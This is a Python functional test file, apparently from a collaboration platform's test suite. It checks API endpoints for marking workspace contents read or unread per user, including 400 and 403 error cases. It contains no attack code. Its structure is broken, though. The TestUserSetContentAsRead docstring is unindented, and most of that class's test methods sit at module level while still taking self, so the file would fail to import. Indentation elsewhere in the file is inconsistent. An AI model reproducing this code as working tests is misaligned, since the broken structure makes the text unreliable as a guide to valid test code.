            content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
        )
        api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "another creation_order_test",
            "",
            True,
        )
        # update order test
        firstly_created_but_recently_updated = api.create(
            content_type_list.Page.slug, workspace, main_folder, "update_order_test", "", True
        )
        api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "another update_order_test",
            "",
            True,
        )
        with new_revision(
            session=dbsession, tm=transaction.manager, content=firstly_created_but_recently_updated
        ):
            firstly_created_but_recently_updated.description = "Just an update"
        api.save(firstly_created_but_recently_updated)
        # comment change order
        firstly_created_but_recently_commented = api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "this is randomized label content",
            "",
            True,
        )
        api.create(
            content_type_list.Page.slug,
            workspace,
            main_folder,
            "this is another randomized label content",
            "",
            True,
        )
        api.create_comment(
            workspace, firstly_created_but_recently_commented, "juste a super comment", True
        )
        api.create(
            content_type_list.Page.slug,
            workspace2,
            main_folder_workspace2,
            "content_workspace_2",
            "",
            True,
        )
        dbsession.flush()
        transaction.commit()
        # authenticate as test_user but request admin's data -> forbidden
        self.testapp.authorization = ("Basic", ("test@test.test", "password"))
        selected_contents_id = [
            firstly_created_but_recently_commented.content_id,
            firstly_created_but_recently_updated.content_id,
            firstly_created.content_id,
            main_folder.content_id,
        ]
        params = {
            "content_ids": "{cid1},{cid2},{cid3},{cid4}".format(
                cid1=selected_contents_id[0],
                cid2=selected_contents_id[1],
                cid3=selected_contents_id[2],
                cid4=selected_contents_id[3],
            )
        }
        url = "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
            workspace_id=workspace.workspace_id, user_id=admin.user_id
        )
        res = self.testapp.get(url=url, status=403, params=params)
        assert isinstance(res.json, dict)
        assert "code" in res.json.keys()
        assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
class TestUserSetContentAsRead(FunctionalTest):
"""
Tests for /api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/read
"""
    def test_api_set_content_as_read__ok__200__admin(self):
        """
        Marking a content as read for one user flips read_by_user for that
        user only: the other user's read status stays False.
        """
        # init DB
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        workspace = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace", save_now=True)
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        # NOTE(review): unlike sibling tests, no lang= is passed here —
        # presumably create_user falls back to a default; confirm.
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            do_save=True,
            do_notify=False,
        )
        rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
        rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
        # two ContentApi instances so read marks are tracked per user
        api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
        api2 = ContentApi(current_user=test_user, session=dbsession, config=self.app_config)
        main_folder = api.create(
            content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
        )
        # creation order test
        firstly_created = api.create(
            content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
        )
        # start from a known state: unread for both admin and test_user
        api.mark_unread(firstly_created)
        api2.mark_unread(firstly_created)
        dbsession.flush()
        transaction.commit()
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        # before: unread for both users
        res = self.testapp.get(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
                user_id=test_user.user_id, workspace_id=workspace.workspace_id
            ),
            status=200,
        )
        assert res.json_body[0]["content_id"] == firstly_created.content_id
        assert res.json_body[0]["read_by_user"] is False
        res = self.testapp.get(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
                user_id=admin.user_id, workspace_id=workspace.workspace_id
            ),
            status=200,
        )
        assert res.json_body[0]["content_id"] == firstly_created.content_id
        assert res.json_body[0]["read_by_user"] is False
        # read: admin marks the content as read on behalf of test_user
        self.testapp.put(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/read".format(
                workspace_id=workspace.workspace_id,
                content_id=firstly_created.content_id,
                user_id=test_user.user_id,
            )
        )
        # after: read for test_user, still unread for admin
        res = self.testapp.get(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
                user_id=test_user.user_id, workspace_id=workspace.workspace_id
            ),
            status=200,
        )
        assert res.json_body[0]["content_id"] == firstly_created.content_id
        assert res.json_body[0]["read_by_user"] is True
        res = self.testapp.get(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
                user_id=admin.user_id, workspace_id=workspace.workspace_id
            ),
            status=200,
        )
        assert res.json_body[0]["content_id"] == firstly_created.content_id
        assert res.json_body[0]["read_by_user"] is False
def test_api_set_content_as_read__ok__200__admin_workspace_do_not_exist(self):
    """Flagging content as read in an unknown workspace answers HTTP 400.

    NOTE(review): the name says ``ok__200`` but the expected answer is
    400 (WORKSPACE_NOT_FOUND); ``err__400`` would match the convention
    used by the sibling "unread" tests — confirm before renaming.
    """
    # fixtures: one workspace, one reader user, one page unread by both
    session = get_tm_session(self.session_factory, transaction.manager)
    admin_user = session.query(User).filter(User.email == "admin@admin.admin").one()
    workspace = WorkspaceApi(
        current_user=admin_user, session=session, config=self.app_config
    ).create_workspace("test workspace", save_now=True)
    user_api = UserApi(current_user=admin_user, session=session, config=self.app_config)
    group_api = GroupApi(current_user=admin_user, session=session, config=self.app_config)
    test_user = user_api.create_user(
        email="test@test.test",
        password="password",
        name="bob",
        groups=[group_api.get_one_with_name("users")],
        timezone="Europe/Paris",
        lang="fr",
        do_save=True,
        do_notify=False,
    )
    role_api = RoleApi(current_user=admin_user, session=session, config=self.app_config)
    role_api.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
    admin_content_api = ContentApi(
        current_user=admin_user, session=session, config=self.app_config
    )
    user_content_api = ContentApi(
        current_user=test_user, session=session, config=self.app_config
    )
    folder = admin_content_api.create(
        content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
    )
    page = admin_content_api.create(
        content_type_list.Page.slug, workspace, folder, "creation_order_test", "", True
    )
    admin_content_api.mark_unread(page)
    user_content_api.mark_unread(page)
    session.flush()
    transaction.commit()
    self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
    # hit the endpoint with a workspace id that does not exist
    read_url = "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/read".format(
        workspace_id=4000, content_id=page.content_id, user_id=test_user.user_id
    )
    response = self.testapp.put(read_url, status=400)
    assert isinstance(response.json, dict)
    assert "code" in response.json.keys()
    assert response.json_body["code"] == ErrorCode.WORKSPACE_NOT_FOUND
def test_api_set_content_as_read__ok__200__admin_content_do_not_exist(self):
    """Flagging an unknown content as read answers HTTP 400.

    NOTE(review): the name says ``ok__200`` but the expected answer is
    400 (CONTENT_NOT_FOUND); ``err__400`` would match the convention
    used by the sibling "unread" tests — confirm before renaming.
    """
    # fixtures: one workspace, one reader user, one page unread by both
    session = get_tm_session(self.session_factory, transaction.manager)
    admin_user = session.query(User).filter(User.email == "admin@admin.admin").one()
    workspace = WorkspaceApi(
        current_user=admin_user, session=session, config=self.app_config
    ).create_workspace("test workspace", save_now=True)
    user_api = UserApi(current_user=admin_user, session=session, config=self.app_config)
    group_api = GroupApi(current_user=admin_user, session=session, config=self.app_config)
    test_user = user_api.create_user(
        email="test@test.test",
        password="password",
        name="bob",
        groups=[group_api.get_one_with_name("users")],
        timezone="Europe/Paris",
        lang="fr",
        do_save=True,
        do_notify=False,
    )
    role_api = RoleApi(current_user=admin_user, session=session, config=self.app_config)
    role_api.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
    admin_content_api = ContentApi(
        current_user=admin_user, session=session, config=self.app_config
    )
    user_content_api = ContentApi(
        current_user=test_user, session=session, config=self.app_config
    )
    folder = admin_content_api.create(
        content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
    )
    page = admin_content_api.create(
        content_type_list.Page.slug, workspace, folder, "creation_order_test", "", True
    )
    admin_content_api.mark_unread(page)
    user_content_api.mark_unread(page)
    session.flush()
    transaction.commit()
    self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
    # hit the endpoint with a content id that does not exist
    read_url = "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/read".format(
        workspace_id=workspace.workspace_id, content_id=4000, user_id=test_user.user_id
    )
    response = self.testapp.put(read_url, status=400)
    assert isinstance(response.json, dict)
    assert "code" in response.json.keys()
    assert response.json_body["code"] == ErrorCode.CONTENT_NOT_FOUND
def test_api_set_content_as_read__ok__200__user_itself(self):
    """A user can flag a content as read for himself; its status flips from unread to read."""
    # fixtures: one workspace, one reader user, one page unread by both
    session = get_tm_session(self.session_factory, transaction.manager)
    admin_user = session.query(User).filter(User.email == "admin@admin.admin").one()
    workspace = WorkspaceApi(
        current_user=admin_user, session=session, config=self.app_config
    ).create_workspace("test workspace", save_now=True)
    user_api = UserApi(current_user=admin_user, session=session, config=self.app_config)
    group_api = GroupApi(current_user=admin_user, session=session, config=self.app_config)
    test_user = user_api.create_user(
        email="test@test.test",
        password="password",
        name="bob",
        groups=[group_api.get_one_with_name("users")],
        timezone="Europe/Paris",
        lang="fr",
        do_save=True,
        do_notify=False,
    )
    role_api = RoleApi(current_user=admin_user, session=session, config=self.app_config)
    role_api.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
    admin_content_api = ContentApi(
        current_user=admin_user, session=session, config=self.app_config
    )
    user_content_api = ContentApi(
        current_user=test_user, session=session, config=self.app_config
    )
    folder = admin_content_api.create(
        content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
    )
    page = admin_content_api.create(
        content_type_list.Page.slug, workspace, folder, "creation_order_test", "", True
    )
    admin_content_api.mark_unread(page)
    user_content_api.mark_unread(page)
    session.flush()
    transaction.commit()
    self.testapp.authorization = ("Basic", ("test@test.test", "password"))
    status_url = "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
        user_id=test_user.user_id, workspace_id=workspace.workspace_id
    )
    # before: page is reported unread
    response = self.testapp.get(status_url, status=200)
    assert response.json_body[0]["content_id"] == page.content_id
    assert response.json_body[0]["read_by_user"] is False
    # the user flags the page as read for himself
    self.testapp.put(
        "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/read".format(
            workspace_id=workspace.workspace_id,
            content_id=page.content_id,
            user_id=test_user.user_id,
        )
    )
    # after: page is reported read
    response = self.testapp.get(status_url, status=200)
    assert response.json_body[0]["content_id"] == page.content_id
    assert response.json_body[0]["read_by_user"] is True
def test_api_set_content_as_read__ok__403__other_user(self):
    """A plain user may not flag content as read on behalf of another user (HTTP 403).

    NOTE(review): name says ``ok__403``; ``err__403`` would match the
    convention used by the sibling "unread" tests — confirm before renaming.
    """
    # fixtures: one workspace, one reader user, one page unread by both
    session = get_tm_session(self.session_factory, transaction.manager)
    admin_user = session.query(User).filter(User.email == "admin@admin.admin").one()
    workspace = WorkspaceApi(
        current_user=admin_user, session=session, config=self.app_config
    ).create_workspace("test workspace", save_now=True)
    user_api = UserApi(current_user=admin_user, session=session, config=self.app_config)
    group_api = GroupApi(current_user=admin_user, session=session, config=self.app_config)
    test_user = user_api.create_user(
        email="test@test.test",
        password="password",
        name="bob",
        groups=[group_api.get_one_with_name("users")],
        timezone="Europe/Paris",
        lang="fr",
        do_save=True,
        do_notify=False,
    )
    role_api = RoleApi(current_user=admin_user, session=session, config=self.app_config)
    role_api.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
    admin_content_api = ContentApi(
        current_user=admin_user, session=session, config=self.app_config
    )
    user_content_api = ContentApi(
        current_user=test_user, session=session, config=self.app_config
    )
    folder = admin_content_api.create(
        content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
    )
    page = admin_content_api.create(
        content_type_list.Page.slug, workspace, folder, "creation_order_test", "", True
    )
    admin_content_api.mark_unread(page)
    user_content_api.mark_unread(page)
    session.flush()
    transaction.commit()
    self.testapp.authorization = ("Basic", ("test@test.test", "password"))
    # test_user tries to flag the content for the admin account
    response = self.testapp.put(
        "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/read".format(
            workspace_id=workspace.workspace_id,
            content_id=page.content_id,
            user_id=admin_user.user_id,
        ),
        status=403,
    )
    assert isinstance(response.json, dict)
    assert "code" in response.json.keys()
    assert response.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
def test_api_set_content_as_read__ok__200__admin_with_comments_read_content(self):
    """Flagging a commented content as read flips its status only for the target user."""
    # fixtures: one workspace, one reader user, one page with a comment,
    # both unread (as seen by the admin's ContentApi)
    session = get_tm_session(self.session_factory, transaction.manager)
    admin_user = session.query(User).filter(User.email == "admin@admin.admin").one()
    workspace = WorkspaceApi(
        current_user=admin_user, session=session, config=self.app_config
    ).create_workspace("test workspace", save_now=True)
    user_api = UserApi(current_user=admin_user, session=session, config=self.app_config)
    group_api = GroupApi(current_user=admin_user, session=session, config=self.app_config)
    test_user = user_api.create_user(
        email="test@test.test",
        password="password",
        name="bob",
        groups=[group_api.get_one_with_name("users")],
        timezone="Europe/Paris",
        lang="fr",
        do_save=True,
        do_notify=False,
    )
    role_api = RoleApi(current_user=admin_user, session=session, config=self.app_config)
    role_api.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
    content_api = ContentApi(current_user=admin_user, session=session, config=self.app_config)
    folder = content_api.create(
        content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
    )
    page = content_api.create(
        content_type_list.Page.slug, workspace, folder, "creation_order_test", "", True
    )
    comment = content_api.create_comment(workspace, page, "juste a super comment", True)
    content_api.mark_unread(page)
    content_api.mark_unread(comment)
    session.flush()
    transaction.commit()
    self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
    status_template = "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status"
    user_status_url = status_template.format(
        user_id=test_user.user_id, workspace_id=workspace.workspace_id
    )
    admin_status_url = status_template.format(
        user_id=admin_user.user_id, workspace_id=workspace.workspace_id
    )
    # before: unread for both users
    response = self.testapp.get(user_status_url, status=200)
    assert response.json_body[0]["content_id"] == page.content_id
    assert response.json_body[0]["read_by_user"] is False
    response = self.testapp.get(admin_status_url, status=200)
    assert response.json_body[0]["content_id"] == page.content_id
    assert response.json_body[0]["read_by_user"] is False
    # flag the page as read for test_user only
    self.testapp.put(
        "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/read".format(
            workspace_id=workspace.workspace_id,
            content_id=page.content_id,
            user_id=test_user.user_id,
        )
    )
    # after: read for test_user, still unread for admin
    response = self.testapp.get(user_status_url, status=200)
    assert response.json_body[0]["content_id"] == page.content_id
    assert response.json_body[0]["read_by_user"] is True
    response = self.testapp.get(admin_status_url, status=200)
    assert response.json_body[0]["content_id"] == page.content_id
    assert response.json_body[0]["read_by_user"] is False
def test_api_set_content_as_read__ok__200__admin_with_comments_read_comment(self):
    """Flagging only the comment as read makes the parent content read for the target user."""
    # fixtures: one workspace, one reader user, one page (read by admin's
    # ContentApi) carrying one unread comment
    session = get_tm_session(self.session_factory, transaction.manager)
    admin_user = session.query(User).filter(User.email == "admin@admin.admin").one()
    workspace = WorkspaceApi(
        current_user=admin_user, session=session, config=self.app_config
    ).create_workspace("test workspace", save_now=True)
    user_api = UserApi(current_user=admin_user, session=session, config=self.app_config)
    group_api = GroupApi(current_user=admin_user, session=session, config=self.app_config)
    test_user = user_api.create_user(
        email="test@test.test",
        password="password",
        name="bob",
        groups=[group_api.get_one_with_name("users")],
        timezone="Europe/Paris",
        lang="fr",
        do_save=True,
        do_notify=False,
    )
    role_api = RoleApi(current_user=admin_user, session=session, config=self.app_config)
    role_api.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
    content_api = ContentApi(current_user=admin_user, session=session, config=self.app_config)
    folder = content_api.create(
        content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
    )
    page = content_api.create(
        content_type_list.Page.slug, workspace, folder, "creation_order_test", "", True
    )
    comment = content_api.create_comment(workspace, page, "juste a super comment", True)
    content_api.mark_read(page)
    content_api.mark_unread(comment)
    session.flush()
    transaction.commit()
    self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
    status_template = "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status"
    user_status_url = status_template.format(
        user_id=test_user.user_id, workspace_id=workspace.workspace_id
    )
    admin_status_url = status_template.format(
        user_id=admin_user.user_id, workspace_id=workspace.workspace_id
    )
    # before: the unread comment makes the page show as unread for both users
    response = self.testapp.get(user_status_url, status=200)
    assert response.json_body[0]["content_id"] == page.content_id
    assert response.json_body[0]["read_by_user"] is False
    response = self.testapp.get(admin_status_url, status=200)
    assert response.json_body[0]["content_id"] == page.content_id
    assert response.json_body[0]["read_by_user"] is False
    # flag only the comment as read, for test_user
    self.testapp.put(
        "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/read".format(
            workspace_id=workspace.workspace_id,
            content_id=comment.content_id,
            user_id=test_user.user_id,
        )
    )
    # after: page shows as read for test_user, still unread for admin
    response = self.testapp.get(user_status_url, status=200)
    assert response.json_body[0]["content_id"] == page.content_id
    assert response.json_body[0]["read_by_user"] is True
    response = self.testapp.get(admin_status_url, status=200)
    assert response.json_body[0]["content_id"] == page.content_id
    assert response.json_body[0]["read_by_user"] is False
class TestUserSetContentAsUnread(FunctionalTest):
    """
    Tests for /api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/unread

    Fix over the previous revision: the two "with_comments" tests
    hard-coded the admin user id as ``/api/v2/users/1/...``; they now use
    ``admin.user_id`` like every sibling test, so they no longer depend on
    the admin row getting id 1.
    """

    def test_api_set_content_as_unread__ok__200__admin(self):
        """Admin can mark a content unread for another user without touching other users' state."""
        # init DB
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        workspace = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace", save_now=True)
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
        rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
        api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
        api2 = ContentApi(current_user=test_user, session=dbsession, config=self.app_config)
        main_folder = api.create(
            content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
        )
        # creation order test
        firstly_created = api.create(
            content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
        )
        api.mark_read(firstly_created)
        api2.mark_read(firstly_created)
        dbsession.flush()
        transaction.commit()
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        # before: read for both users
        res = self.testapp.get(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
                user_id=test_user.user_id, workspace_id=workspace.workspace_id
            ),
            status=200,
        )
        assert res.json_body[0]["content_id"] == firstly_created.content_id
        assert res.json_body[0]["read_by_user"] is True
        res = self.testapp.get(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
                user_id=admin.user_id, workspace_id=workspace.workspace_id
            ),
            status=200,
        )
        assert res.json_body[0]["content_id"] == firstly_created.content_id
        assert res.json_body[0]["read_by_user"] is True
        # unread, for test_user only
        self.testapp.put(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/unread".format(
                workspace_id=workspace.workspace_id,
                content_id=firstly_created.content_id,
                user_id=test_user.user_id,
            )
        )
        # after: unread for test_user, still read for admin
        res = self.testapp.get(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
                user_id=test_user.user_id, workspace_id=workspace.workspace_id
            ),
            status=200,
        )
        assert res.json_body[0]["content_id"] == firstly_created.content_id
        assert res.json_body[0]["read_by_user"] is False
        res = self.testapp.get(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
                user_id=admin.user_id, workspace_id=workspace.workspace_id
            ),
            status=200,
        )
        assert res.json_body[0]["content_id"] == firstly_created.content_id
        assert res.json_body[0]["read_by_user"] is True

    def test_api_set_content_as_unread__err__400__admin_workspace_do_not_exist(self):
        """Marking content unread in an unknown workspace answers 400 WORKSPACE_NOT_FOUND."""
        # init DB
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        workspace = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace", save_now=True)
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
        rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
        api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
        api2 = ContentApi(current_user=test_user, session=dbsession, config=self.app_config)
        main_folder = api.create(
            content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
        )
        # creation order test
        firstly_created = api.create(
            content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
        )
        api.mark_read(firstly_created)
        api2.mark_read(firstly_created)
        dbsession.flush()
        transaction.commit()
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        # unread with an unknown workspace id
        res = self.testapp.put(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/unread".format(
                workspace_id=4000, content_id=firstly_created.content_id, user_id=test_user.user_id
            ),
            status=400,
        )
        assert isinstance(res.json, dict)
        assert "code" in res.json.keys()
        assert res.json_body["code"] == ErrorCode.WORKSPACE_NOT_FOUND

    def test_api_set_content_as_unread__err__400__admin_content_do_not_exist(self):
        """Marking an unknown content unread answers 400 CONTENT_NOT_FOUND."""
        # init DB
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        workspace = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace", save_now=True)
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
        rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
        api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
        api2 = ContentApi(current_user=test_user, session=dbsession, config=self.app_config)
        main_folder = api.create(
            content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
        )
        # creation order test
        firstly_created = api.create(
            content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
        )
        api.mark_read(firstly_created)
        api2.mark_read(firstly_created)
        dbsession.flush()
        transaction.commit()
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        # unread with an unknown content id
        res = self.testapp.put(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/unread".format(
                workspace_id=workspace.workspace_id, content_id=4000, user_id=test_user.user_id
            ),
            status=400,
        )
        assert isinstance(res.json, dict)
        assert "code" in res.json.keys()
        assert res.json_body["code"] == ErrorCode.CONTENT_NOT_FOUND

    def test_api_set_content_as_unread__ok__200__user_itself(self):
        """A user can mark a content unread for himself; status flips from read to unread."""
        # init DB
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        workspace = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace", save_now=True)
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
        rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
        api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
        api2 = ContentApi(current_user=test_user, session=dbsession, config=self.app_config)
        main_folder = api.create(
            content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
        )
        # creation order test
        firstly_created = api.create(
            content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
        )
        api.mark_read(firstly_created)
        api2.mark_read(firstly_created)
        dbsession.flush()
        transaction.commit()
        self.testapp.authorization = ("Basic", ("test@test.test", "password"))
        # before: read
        res = self.testapp.get(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
                user_id=test_user.user_id, workspace_id=workspace.workspace_id
            ),
            status=200,
        )
        assert res.json_body[0]["content_id"] == firstly_created.content_id
        assert res.json_body[0]["read_by_user"] is True
        # unread
        self.testapp.put(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/unread".format(
                workspace_id=workspace.workspace_id,
                content_id=firstly_created.content_id,
                user_id=test_user.user_id,
            )
        )
        # after: unread
        res = self.testapp.get(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
                user_id=test_user.user_id, workspace_id=workspace.workspace_id
            ),
            status=200,
        )
        assert res.json_body[0]["content_id"] == firstly_created.content_id
        assert res.json_body[0]["read_by_user"] is False

    def test_api_set_content_as_unread__err__403__other_user(self):
        """A plain user may not mark content unread on behalf of another user (HTTP 403)."""
        # init DB
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        workspace = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace", save_now=True)
        uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
        gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
        groups = [gapi.get_one_with_name("users")]
        test_user = uapi.create_user(
            email="test@test.test",
            password="password",
            name="bob",
            groups=groups,
            timezone="Europe/Paris",
            lang="fr",
            do_save=True,
            do_notify=False,
        )
        rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
        rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
        api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
        api2 = ContentApi(current_user=test_user, session=dbsession, config=self.app_config)
        main_folder = api.create(
            content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
        )
        # creation order test
        firstly_created = api.create(
            content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
        )
        api.mark_read(firstly_created)
        api2.mark_read(firstly_created)
        dbsession.flush()
        transaction.commit()
        self.testapp.authorization = ("Basic", ("test@test.test", "password"))
        # unread on behalf of admin -> forbidden
        res = self.testapp.put(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/unread".format(
                workspace_id=workspace.workspace_id,
                content_id=firstly_created.content_id,
                user_id=admin.user_id,
            ),
            status=403,
        )
        assert isinstance(res.json, dict)
        assert "code" in res.json.keys()
        assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE

    def test_api_set_content_as_unread__ok__200__with_comments_read_content(self):
        """Marking a commented content unread flips its status back to unread for the user."""
        # init DB
        dbsession = get_tm_session(self.session_factory, transaction.manager)
        admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
        workspace = WorkspaceApi(
            current_user=admin, session=dbsession, config=self.app_config
        ).create_workspace("test workspace", save_now=True)
        api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
        main_folder = api.create(
            content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
        )
        # creation order test
        firstly_created = api.create(
            content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
        )
        comments = api.create_comment(workspace, firstly_created, "juste a super comment", True)
        api.mark_read(firstly_created)
        api.mark_read(comments)
        dbsession.flush()
        transaction.commit()
        self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
        # before: read (use admin.user_id rather than a hard-coded id)
        res = self.testapp.get(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
                user_id=admin.user_id, workspace_id=workspace.workspace_id
            ),
            status=200,
        )
        assert res.json_body[0]["content_id"] == firstly_created.content_id
        assert res.json_body[0]["read_by_user"] is True
        self.testapp.put(
            "/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/unread".format(
                workspace_id=workspace.workspace_id,
                content_id=firstly_created.content_id,
                user_id=admin.user_id,
            )
        )
        # after: unread
        res = self.testapp.get(
